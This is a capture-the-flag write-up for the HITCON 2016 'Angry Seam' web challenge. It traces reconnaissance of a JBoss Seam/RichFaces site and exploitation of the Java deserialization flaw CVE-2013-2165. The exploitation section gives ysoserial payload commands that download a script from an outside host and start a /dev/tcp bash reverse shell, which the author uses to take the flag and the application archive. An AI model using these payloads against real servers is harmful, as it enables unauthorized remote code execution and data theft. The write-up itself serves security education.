Web500 Hitconctf 2016 and exploit CVE-2013-2165

*** Problem: Angry Seam***
Why my teammate, Sean, is so angry?

*** Solution: ***

1. Reconnaissance website

This website has functions: register, login, change profile, report url, logout. Creating user and test some functions of website is the first step I do.

I use burpsuite free for proxying and mapping website.
This is the result:

Based on extension of urls (.seam) and problem description, It seems that this website use Jboss Seam framework (http://seamframework.org). Response header “Server: Apache-Coyote/1.1” => server run Apache tomcat (it might not run jboss application server). Application context is angryseam (So, application deployed mostly is angryseam.war).
This website have interesting request: Change location parameter to other value, server return error 500 Exception. This error told our server run Apache tomcat 7.0.52, application use JSF technology (.xhtml) for ui templates. There some packages of jboss seam framework: org.jboss.seam.*, org.jboss.seam.example.jpa.* and strange package I don’t know: org.ajax4jsf.webapp.* . I test some path traveral payloads with hoping to get source code application,But i couldn’t get any interesting files in server: angryseam.war, WEB-INF/web.xml, css.xhtml,…


I do continue exploring the website. The next function I pay attention to is resport.seam. We can enter a url and submit for reporting to admin. I think about XSS vulnerability and try some payloads for xss testing. I’m still not success .

I search google package org.ajax4jsf.webapp.*. This package belongs to Richfaces library. http://richfaces.jboss.org library. This library help our programming ajax-based web application more easier. It ussually combines with Jboss Seam framework and JSF, Hibernate to create a stack techonology for developing enterprise web application java. Moreover, the version of Richfaces of this website is 3.3.3.Final (Look again second images). Util then, I mostly understand technologies which the author uses for building website. However, how do the author code this website? Reading html code generated in some pages: login.seam, register.seam,i see some keywords: User Name, Real Name, Password, Verify Password, verifyDecorate, passwordDecorate,… In addtionally, package name org.jboss.seam.example.jpa.* give us some hints. The author seem to use a example application of Jboss seam to build this website. So, I download some versions of Jboss Seam (jboss-seam-2.3.1.Final, … ) and verify my thingking. I found that Jboss seam 2.2.1.Final is exactly version which website use. Jboss seam 2.2.1Final have a example application named “jpa”; it also have some functions: register, login,logout with some keywords: User Name, Real Name, verifyDecorate,..; and it also use Richfaces 3.3.3Final :)))))


Next, I search google for all of well-known vulneability of technolgies which website uses: jboss seam 2.2.1, Richfaces 3.3.3Final, Tomcat 7.0.52, Hibernate 3,…
I found a interesting vulnerability of Jboss seam and Richfaces:

The CVE-2013-2165 is about java deserialize vulnerability. This is well-known vulnerability discovered in so many applications recently. So I decide to try exploit this bug. The chance of success is not much. I’m not sure that this is the correct solution for this ctf challenge but it’s worth exploring.
In the past, I have a few experiences with java framwork such as struts, spring, hibernate,.. . Therefore,firstly, I will setup a debug environment for example application “jpa” of jboss seam 2.2.1Final.

2. Setup Environment

My Environment:
– Windows x64
– Java JDK 8u101 x86 (newest, download from oracle homepage)
– Eclipse J2EE Kepler
– Apache Tomcat 7.0.52 (download from apache tomcat homepage) for run app.
– Maven 3 (embbed in Eclipse ) for compiling and packaging app.
– “jpa” example application (use Jboss Seam 2.2.1Final, JSF 1.2, Richfaces 3.3.3Final, hsqldb, hibernate3, log4j…)
I willnot talk so much about this part because it relates much to java web development. And this is a long process, I think so. Someone who want to build this example application should read jboss documentation, learn some technology servlet, jsp ,jsf, hibernate, logging,… and some tools such as maven (very important, support downloading source and deep debug in core framework), eclipse.
I recommend this site for learning java framework: http://mkyong.com
Some hours fix bug, I have this example application run 🙂


3. Exploit CVE-2013-2165

The information of this cve is little short and hard to understand. The vulnerability is in ResourceBuilderImpl class. Search for this class, I know this class is in richfaces-impl-3.3.3.Final.jar:org.ajax4jsf.resource.ResourceBuilderImpl.class. Using maven to build project, I could easily view source code of this class. This class seems to relate to resource management (js,css,img,..) of website. I can set some breakpoints in this class, and run project in debug mode in eclipse. But how the client request can route to this class for handling resource?


I check some normals request of website. And I found these uri in both example application and angryseam application:

Look at the prefix : “/a4j”. Resource requests for Richfaces use uri prefix “/a4j”. It means any request to server have uri prefix “/a4j”, Richfaces will handle them. And when I request this url in debug mode, a breakpoint in ResourceBuilderImpl hit. Great. Some hours with debugging and source code reading, I mostly understand flow request handling as following:
1. Browser request url: http://localhost:8082/jboss-seam-jpa/a4j/g/3_3_3.Finalorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxxxxxxxxxxxxxxx
2. Tomcat handle request and detect prefix “/a4j”, tomcat route this request to Richfaces
3. Richfaces handle request with input is “g/3_3_3.Finlaorg/richfaces/renderkit/html/scripts/skinning.js/DATA/xxxxxxxxxxxxxxxxxxxxxx”
Richfaces use ResourceBuilderImpl for parsing input and get resource
Richfaces ignore string “g/3.3.3.Final” (this string is a constant that depends on version of Richfaces)
Richfaces get path resource org/richfaces/renderkit/html/scripts/skinning.js
Richfaces get additional data from “DATA/xxxxxxxxxxxxxxxxxxxxxx”, extract raw data value: xxxxxxxxxxxxxxxxxxxxxx
Richfaces decompress data value (xxxxxxxxxxxxxxxxxxxx) and deserialize ← EXPLOIT


I can control uri request, so I also can control DATA part, which is the input for deserializing in ResourceBuilderImpl. I use ysoserial for generating payloads (https://github.com/frohoff/ysoserial).
Some payload for creating reverse shell:
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 “/usr/bin/wget -O /tmp/reverseshell http://x.x.x.x/reverseshell” > payload.bin
java -jar ysoserial-0.0.5-SNAPSHOT-all.jar CommonsCollections5 “/bin/bash /tmp/reverseshell” > payload.bin
reverseshell: /bin/bash -c ‘/bin/bash -i >/dev/tcp/x.x.x.x 2>&1’

Source code for creating DATA part from payloads:


Some result I run in server after reverse shell success:
Flag: hitcon{d0 you really g3t th1s fl4g by CSS RPO?}
File angryseam.war get from server: angryseam.war
(I think the author’s solution is about RPO attack)

P/s: I check tomcat and mysql packages in server because they have privilege escalation getroot vulnerability recently. But these version in server actually keep update and are not vulnerable.